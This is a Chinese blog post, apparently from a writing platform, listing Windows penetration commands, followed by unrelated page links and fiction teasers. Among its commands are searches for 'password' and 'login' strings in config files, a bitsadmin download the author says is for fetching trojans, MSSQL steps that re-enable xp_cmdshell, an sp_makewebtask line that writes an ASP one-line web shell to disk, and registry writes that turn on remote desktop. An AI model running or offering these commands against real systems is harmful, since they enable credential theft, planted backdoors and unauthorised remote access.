windows渗透命令

1. 获取操作系统信息

systeminfo

2.获取ARP缓存信息:

arp -a

结果:
接口: 169.254.249.47 --- 0xc
  Internet 地址         物理地址              类型
  169.254.255.255       ff-ff-ff-ff-ff-ff     静态
  224.0.0.22            01-00-5e-00-00-16     静态
  224.0.0.251           01-00-5e-00-00-fb     静态
  224.0.0.252           01-00-5e-00-00-fc     静态
  239.255.255.250       01-00-5e-7f-ff-fa     静态
  255.255.255.255       ff-ff-ff-ff-ff-ff     静态

3. 查看服务进程id

tasklist /SVC

cmd.exe                       9508 暂缺
conhost.exe                   2216 暂缺
chrome.exe                   11616 暂缺
navicat.exe                  11520 暂缺
chrome.exe                   11336 暂缺
chrome.exe                   11408 暂缺
WeChat.exe                    1672 暂缺
WeChatWeb.exe                11744 暂缺
chrome.exe                   11936 暂缺
notepad++.exe                12716 暂缺
HipsDaemon.exe               13504 HipsDaemon
usysdiag.exe                 11376 暂缺
chrome.exe                    5440 暂缺
chrome.exe                    6136 暂缺
YNoteCefRender.exe           13756 暂缺
chrome.exe                   11276 暂缺
chrome.exe                    1324 暂缺
chrome.exe                    4560 暂缺
taskeng.exe                   5552 暂缺
tasklist.exe                 13384 暂缺
WmiPrvSE.exe                 13928 暂缺

4.查看服务、进程和启动程序信息:

 wmic service list brief 
 wmic process list brief
 wmic startup list brief

这三个命令十分强大。
不过在win8下面好像被禁了。

5.敏感数据和目录

 dir /b/s password.txt
 dir /b/s config.* 
 findstr /si password *.xml *.ini *.txt
 findstr /si login *.xml *.ini *.txt

前两个命令是查文件的,比如在ctf比赛中,可以查flag.txt或者flag.*
后两个是是查找文件中的字符串。

6. 文件下载

bitsadmin /transfer n http://download.fb.com/file/xx.zip c:\pentest\xx.zip

可以用来下载木马什么的。不过速度确实不怎么快,用于下个小文件。

7.mssql相关
说到这个,就必须要介绍xp_cmdshell了,通过该存储过程可以在数据库服务器中执行任意系统命令。MSSQL2005,2008等之后版本的MSSQL都分别对系统存储过程做了权限控制以防止被滥用。

xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重修开启它。


EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
exec sp_configure

开启后可以执行语句:


sp_makewebtask写入一句话

如果未启用Web Assistant Procedures
SQLServer 阻止了对组件 'WebAssistant Procedures' 的 过程'sys.xp_makewebtask' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。

开启:

exec sp_configure 'Web AssistantProcedures', 1; RECONFIGURE

写入木马:

exec sp_makewebtask 'c:\1.asp','select''<%execute(request("ruo"))%>'''

注册表操作
启用存储过程:

exec sp_addextendedprocxp_regread,'xpstar.dll'

查看远程桌面开启

exec xp_regread
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer',
'fDenyTSConnections'

开启远程桌面

exec xp_regwrite
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer',
'fDenyTSConnections',
'REG_DWord',0

参考http://www.freebuf.com/articles/system/114731.html
http://www.freebuf.com/articles/web/55577.html

©著作权归作者所有,转载或内容合作请联系作者
  • 人面猴
    序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,921评论 6 478
  • 死咒
    序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 87,635评论 2 381
  • 救了他两次的神仙让他今天三更去死
    文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,393评论 0 338
  • 道士缉凶录:失踪的卖姜人
    文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,836评论 1 277
  • 港岛之恋(遗憾婚礼)
    正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,833评论 5 368
  • 恶毒庶女顶嫁案:这布局不是一般人想出来的
    文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,685评论 1 281
  • 城市分裂传说
    那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,043评论 3 399
  • 双鸳鸯连环套:你想象不到人心有多黑
    文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,694评论 0 258
  • 万荣杀人案实录
    序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 42,671评论 1 300
  • 护林员之死
    正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,670评论 2 321
  • 白月光启示录
    正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,779评论 1 332
  • 活死人
    序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,424评论 4 321
  • 日本核电站爆炸内幕
    正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,027评论 3 307
  • 男人毒药:我在死后第九天来索命
    文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,984评论 0 19
  • 一桩弑父案,背后竟有这般阴谋
    文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,214评论 1 260
  • 情欲美人皮
    我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,108评论 2 351
  • 代替公主和亲
    正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,517评论 2 343

推荐阅读更多精彩内容

  • From:黑白之道
    一套实用的渗透测试岗位面试题,你会吗? 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源...
    g0阅读 4,811评论 0 9
  • 【转】手工sql注入
    1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3....
    钦玄阅读 1,224评论 0 5
  • 诗与远方,远不如眼下的“苟且”珍贵
    好多人会觉得 眼下的生活,手边的工作 貌似都是苟且 唯有远方,才有诗歌与田野 然而 当亲征远方 才发现 那并不都是...
    晴晴晴阅读 713评论 0 1
  • 初见云南
    风花雪月与来观,日惜光景似绵长。
    她说不出的话阅读 242评论 0 0
  • 痛痒
    假如有人对你说,我会想你的。你什么心情? 好吧,反正我会窃喜的。 对你而言重要的人只当你是“某人”,你什么心情?我...
    铭93阅读 316评论 0 1